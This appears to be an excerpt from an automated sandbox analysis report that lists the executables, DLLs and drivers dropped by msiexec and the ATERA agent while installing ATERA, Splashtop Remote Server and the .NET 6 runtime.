                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Http.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRAppBS.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\libmp4v2.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Windows\System32\SRCEF21.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\plugin\SRAppED.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Globalization.Calendars.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\utils\devcon.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\QRCoder.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.AccessControl.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Buffers.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRx264WrapperExx.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\win10\64bits\stvad.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRAppPB.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVAD\utils\DIFxCmd64.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SRChat.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Extensions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Claims.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Thread.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win10\x86\lci_iddcx.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Atera.Utils.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Memory.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Monitor\utils\devcon64.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.ZipFile.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Requests.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.IsolatedStorage.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Channels.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\BdEpSDK.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Dapper.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Console.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\CredentialManagement.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Loader.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.SecureString.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Transactions.Local.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\utils\DIFxCmd.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\fr\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\64bits\xdscale.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.Specialized.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVirtualUSB\SRUsb\x64\SRUsb.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.Win32.Registry.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\libssl-3.dllJump to dropped file
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeDropped PE file which has not been started: C:\Windows\Temp\unpack\libssl-3.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Support\CredProvider\x64\SRCredentialProvider.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x86\lci_proxyumd.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Linq.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Tracing.dllJump to dropped file
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeDropped PE file which has not been started: C:\Windows\Temp\unpack\SRSocketCtrl.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.Annotations.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIDCAB.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Reflection.Emit.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\SROpus.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Principal.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Xml.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.FileSystem.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Monitor\64bits\stdpms.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XmlSerializer.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.Ping.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.Serialization.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackages.ModelsV3.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Abstractions.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIF4AD.tmp-\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\CredentialManagement.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.TraceSource.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Dynamic.Runtime.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVideo\64bits\stvideo.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\RunScriptAsUser.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.Watcher.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\runtimes\win\lib\net6.0\System.ServiceProcess.ServiceController.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\x86\SQLite.Interop.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.Native.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Tracing.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\x86\SQLite.Interop.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\vista64\setupdrv.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.AgentPackages.CommonLib.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVSpk\32bits\stvspk.sysJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\LiteDB.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Private.Xml.Linq.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Options.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ObjectModel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Tools.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x86\lci_proxyumd32.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.FileVersionInfo.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\VirtualDriver\hidkmdf.sysJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.XPath.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSIC672.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\BdEpSDK_x86.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Support\SetupUtil.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\host\fxr\6.0.35\hostfxr.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.TextWriterTraceListener.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\64bits\xdnup.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STVirtualUSB\SRUsb\x86\SRUsbVhciCtrl32.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.NonGeneric.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Overlapped.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\Mirror\utils\devcon64.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.UnmanagedMemoryStream.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Binder.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Windows\Temp\{3302634C-E4F1-4E20-978A-65EAB068911F}\ISRT.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\32bits\xdsmplui.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\64bits\xdbook.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\win10\32bits\XDColMan.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\UserDetections.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x64\lci_proxyumd32.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6738.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XPath.XDocument.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\mscordbi.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x64\lci_proxywddm.sysJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Drawing.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIDEEF.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\plugin\SRAppFileHound.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Timer.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\LciDisplay\win7\x64\lci_iddcx.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\Splashtop\Splashtop Remote\Server\Driver\STPrinter\64bits\stprintmon.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Http.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Text.RegularExpressions.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
